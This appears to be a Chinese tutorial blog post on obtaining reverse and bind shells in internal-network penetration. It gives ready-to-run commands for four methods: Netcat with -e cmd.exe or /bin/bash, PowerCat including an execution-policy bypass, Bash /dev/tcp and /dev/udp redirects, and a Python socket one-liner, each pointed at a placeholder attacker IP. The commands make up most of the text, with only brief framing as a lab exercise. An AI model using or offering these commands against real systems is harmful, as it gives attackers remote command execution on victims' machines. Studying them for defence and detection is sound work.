内网安全:反弹shell

目录

一.Netcat反弹Shell

二.PowerCat反弹Shell

PowerCat和nc正向连接

PowerCat和nc反向连接

PowerCat和PowerCat反向连接

三.Bash反弹shell

[四.Python 反弹Shell](#四.Python 反弹Shell)


一.Netcat反弹Shell

在Windows容易被杀

介绍:

Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作,常用参数如下
注意:这里需要关闭靶机的防火墙,做NC反弹的时候,前提你也经控制了对方电脑

正向反弹:

场景:攻击机器和靶机都是在公网上,都能互ping,这个时候可以用正向反弾

利用:

1.在靶机上运行:

nc -lvvp 1111 -e C:\Windows\System32\cmd.exe windows机器

nc -lvvp 1111 -e /bin/bash linux机器

这里以Linux作演示

2在攻击机上运行:

nc -v 靶机IP 1111

3.拿到shell

反向反弹:

实验前提:

攻击机器在公网上,靶机在内网里面,这时候需要靶机反向链接攻击机器,也就是反向反弹

利用:

1在攻击者机器运行:

nc -lvvp 1111 监听1111端口

2.在靶机上运行 (反弹到公网)

nc -e C:\Windows\System32\cmd.exe 攻击IP 1111 windos机器

nc -e /bin/bash 攻击IP 1111 linux机器

这里用Linux作演示

3.拿到反向的shell

二.PowerCat反弹Shell

和NC作用一样,只能用于Windows

介绍:可以无文件落地

PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。

利用:

1.导入模块:

Import-Module .\powercat.ps1

如果提示未能加载指定模块,则可能是权限问题,输入如下代码

Set-ExecutionPolicy Unrestricted

PowerCat和nc正向连接

1、靶机使用powercat执行以下命令:

powercat -l -p 8080 -e cmd.exe -v

2、攻击机使用nc执行以下命令:

nc -v 靶机IP 8080 -vv

3.成功反弹

PowerCat和nc反向连接

1、靶机使用powercat执行以下命令

powercat -c 攻击机IP -p 8888 -v -e cmd.exe

2、攻击机使用nc执行以下命令:

nc -l -p 8888 -vv

3.成功反弹

PowerCat和PowerCat反向连接

1、靶机使用powercat执行以下命令:

powercat -c 攻击机器IP -p 9999 -v -ep

2、攻击机使用powercat执行以下命令:

powercat -l -p 9999 -v

3.成功反弹

三.Bash反弹shell

介绍:传输层的隧道

** Shell也称为终端或壳,是人与内核之间的翻译官,而Bash则是Linux中默认使用的Shell**
** Bash 反弹Shell的命令如下:**

bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1

bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&2

bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1

bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2

利用:

1、攻击机器使用nc执行监听命令**

nc -lvvp 9999 监听 TCP

nc -lup 9999 监听UDP (UDP不稳定)

2、实验靶机执行连接命令

bash -i >&/dev/tcp/攻击机器IP/9999 0>&1

3.成功反弹

四.Python 反弹Shell

利用:

1、攻击机器使用nc执行监听命令

nc -lvvp 1111 监听 TCP

2、实验靶机执行连接命令

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机器IP",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

3.成功反弹

相关推荐
newxtc4 小时前
【图虫创意-注册安全分析报告-无验证方式导致安全隐患】
安全·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析
yaoxin5211239 小时前
第二十三章 加密安全标头元素
前端·数据库·安全
阿里云云原生9 小时前
Serverless 安全新杀器:云安全中心护航容器安全
安全·云原生·serverless
创小董9 小时前
无人机低空安全管控系统技术详解
安全·无人机
马船长9 小时前
时间&安全精细化管理平台存在未授权访问漏洞
安全·web安全
newxtc9 小时前
【新片场-注册安全分析报告-无验证方式导致安全隐患】
安全
newxtc9 小时前
【红动中国-注册/登录安全分析报告】
安全
猫的饭桌10 小时前
布偶猫应该喂什么猫罐头:交响乐金罐、希喂、尾巴生活测评
经验分享·笔记·安全·生活
花开盛夏^.^12 小时前
网络安全宣传周的时间,举办活动的方式和意义
网络·安全·web安全
anddddoooo13 小时前
pWnOS的第二种全新解法(ssh私钥破解、webmin漏洞提权)
linux·运维·安全·web安全·网络安全·ssh